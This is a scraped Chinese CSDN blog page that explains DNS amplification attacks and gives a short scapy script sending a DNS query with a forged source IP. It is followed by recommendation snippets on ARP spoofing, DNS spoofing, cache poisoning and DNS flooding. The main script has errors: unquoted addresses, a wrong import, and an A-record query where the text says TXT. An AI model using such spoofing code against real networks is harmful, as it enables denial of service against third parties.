scapy模拟攻击_用scapy模拟DNS放大攻击

最新推荐文章于 2023-11-17 22:40:48 发布
最新推荐文章于 2023-11-17 22:40:48 发布
阅读量231 收藏 1
点赞数
文章标签: scapy模拟攻击
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39568232/article/details/114469281
版权

首先,DNS放大攻击,简单解释有两点:

1.伪造源IP为其他人的ip地址

2.被请求的记录,要求比较大,比如TXT格式,4000KB

在A机器上,向DNS发送查询那个TXT的记录,并伪造成别人的ip,即可理解为DNS放大攻击。

可以用python的scapy模拟:

from scapy import *

a = IP(dst=10.32.8.11,src=10.32.132.85)     #10.32.132.85即为伪造的源ip

b = UDP(dport=53)

c = DNS(id=1,qr=0,opcode=0,tc=0,rd=1,qdcount=1,ancount=0,nscount=0,arcount=0)

c.qd=DNSQR(qname=www.qq.com,qtype=1,qclass=1)

p = a/b/c

send(p)

模拟结束。

在10.32.132.85上抓dns的包,就会收到一条DNS响应,是10.32.8.11发来的。

---------------------------------------------------------------------------低调的python小子

weixin_39568232
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Python中使用scapy模拟数据包实现arp攻击dns放大攻击例子
12-23
这里就直接用python的scapy搞。 这里是arp的攻击方式,你可以做成arp攻击。 复制代码 代码如下: #!/usr/bin/python “”” ARP attack “”” import sys, os from scapy.all import * if os.geteuid() != 0:  ...
Scapy:DNS数据包详解
m0_71713477的博客
01-14 2964
ScapyDNS数据包详解(DNS协议,DNS包参数)
基于Python3的Scapy构造DNS报文
ftzchina的博客
10-21 1044
一文详解利用Scapy构造DNS报文
Python 使用Scapy操作DNS流量
CSDN
10-07 7538
通常一个DNS数据包,客户端发送DNSQR请求包,服务器发送DNSRR响应包。一个DNSQR包含有查询的名称qname、查询的类型qtype、查询的类别qclass。一个DNSRR包含有资源记录名名称rrname、类型type、资源记录类别rtype、TTL等等。流量,解析DNSRR的数据包,提取分别含有查询的域名和对应的IP的rrname和rdata变量。这里只检查服务器53端口的数据包,DNS数据包有个rcode字段,当其值为3时表示域名不存在。
python实现dns欺骗_使用scapy客户端timingou进行dns欺骗
weixin_39769183的博客
12-15 316
考虑一下这个简单的python dns欺骗:#!/usr/bin/python3import socketfrom scapy.all import *port = 53def handle(payload):data = payload[0]src_ip = payload[1][0]src_port = payload[1][1]print("-" * 10 + " Incoming " +...
数据包处理利器——Scapy高级使用
wanger5354的博客
07-15 1107
微信公众号:运维开发故事 ,作者:wanger 主机探测 TCP SYN Ping 发送仅设置了SYN的空TCP数据包。 SYN/ACK或RST响应表示机器已启动并正在运行。 >>> ans,unans=sr(IP(dst="60.205.177.0/28")/TCP(dport=80,flags="S")) Begin emission: Finished sending 16 packets. .*********.................................
scapy_rebuild_pcap_pkt.txt
07-02
从pcap文件中嗅探数据包,修改数据包的最后4个字节并发送它,
scapy-ssl_tls-1.2.3.4.zip
04-11
使用python来解析加密数据包,可通过pycharm安装Scapy-ssl_tls库文件,但库文件经常会安装失败,因此需要考虑直接安装python对应版本的Scapy-ssl_tls库文件
Scapy_库_ARP_Scanner
07-27
Scapy(Ether、ARP、srp1模块介绍)、Scanner脚本编写[ARP数据包的构造]
利用python+scapy抓取DNS数据包
06-04
程序只会抓取DNS数据包。不会去抓取其他类型的数据包!
基于Python3的scapy解析SSL报文(一)
最新发布
ftzchina的博客
11-17 2229
scapy对于SSL的支持个人觉得不太好,至少在构造报文方面没有HTTP或者DNS这种常见的报文有效方便,但是scapy对于SSL的解析还是可以的。下面我们以一个典型的HTTPS的报文为例,展示scapy解析SSL报文。
模拟DNS缓存毒药攻击
QA Engineer
05-24 475
第一步:创建DNS服务器。在Windows 2003 Server中,依次单击“开始→管理工具→配置您的服务器向导”,在打开的向导页中依次单击“下一步”按钮。配置向导自动检测所有网络连接的设置情况,若没有发现问题则进入“服务器角色”向导页。 然后在“服务器角色”列表中单击“DNS服务器”选项(图1),并单击“下一步”按钮。打开“选择总结”向导页,如果列表中出现“安装DNS服务器”和“运行配置 D...
DNS协议
分享博主日常学习和使用的一些技术
07-22 262
todo 今天抓包碰到了DNS协议,感觉是我知识的盲点,影响了我的判断,现在争取把这个盲点给补充上。 《TCP/IP详解》第14章详细介绍了dns相关知识 几个问题 dns缓存时间是多少? dns服务器是干什么的? dns的报文长什么样? dns的流程是怎么样子的? 先走hosts,如果hosts里面没有,会去查dns服务器 dns报文使用的端口?53号端口 dns使用udp还是tcp? dns的查询和响应通常要经过广域网 dns报文格式 ...
python scapy实现ARP欺骗与DNS欺骗
Anansi的博客
03-27 5166
关于ARP ARP协议(地址解析协议),是一个能够将IP地址转换为MAC地址来让设备间通讯的协议,由于设备间进行网络通讯时,需要将网络层IP数据包包头中的IP地址信息解析出目标硬件(MAC地址)信息来保证通信的顺利进行,所以就有了ARP协议的存在,可在windows下的cmd中输入指令arp -a来查看本机arp缓存。在后面我会用两台电脑做测试,一台是linux系统为模拟黑客的设备,另一台是win...
wireshark抓取dns_利用Scapy打造简单的DNS监测脚本
weixin_39675038的博客
11-24 629
简介因为最近工作中有个需求是需要记录终端的dns请求,并进行对比和记录,这里研究了一下,使用python写了一个简单的本机dns请求的监控脚本。脚本设置后可以监控本机对特定域名的请求记录,以及记录这些dns请求的响应内容。用到了python一个看起来应用可以很广的(据我搜索的结果,可以使用这个模块进行本机的, 好像并没有什么明显的意义, DNS欺骗)模块——scapy。本文只使用了这个模块的一小部...
Python中的Scapy初探之五-DNS洪水攻击
txyj08的专栏
08-28 2679
原文地址:Python中的Scapy初探之五-DNS洪水攻击作者:小牛牛 肿么回事,现在肿么都是这些东西?不过看了别人的代码,忍不住留个纪念,对生成随机的数据包有启发,其实,在Scapy有专门的洪水发包的方法 srflood             : Flood and receive packets at layer 3 srloop              : Send
Python中的Scapy初探之四--DNS中毒
txyj08的专栏
08-28 2154
原文地址:Python中的Scapy初探之四--DNS中毒作者:小牛牛 今天做了ARP缓存中毒,又看到了DNS中毒,觉得比较新鲜。Scapy还真不是盖的 简单来说,DNS中毒就是自己做一个应答的DNS包,发送给客户端,这样,客户端就中毒了,因为不管发出什么DNS请求解析,得到的都是伪装的DNS应答包,这样就什么都访问不了鸟,这个做起来也非常的简单 Scapy里面有一个工具,就
scapy ARP攻击
08-14
要进行ARP攻击,你可以使用Scapy来构建和发送ARP欺骗数据包。 下面是一个使用Scapy进行ARP欺骗攻击的示例代码: ```python from scapy.all import * def arp_spoof(target_ip, spoof_ip): target_mac = get_mac...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值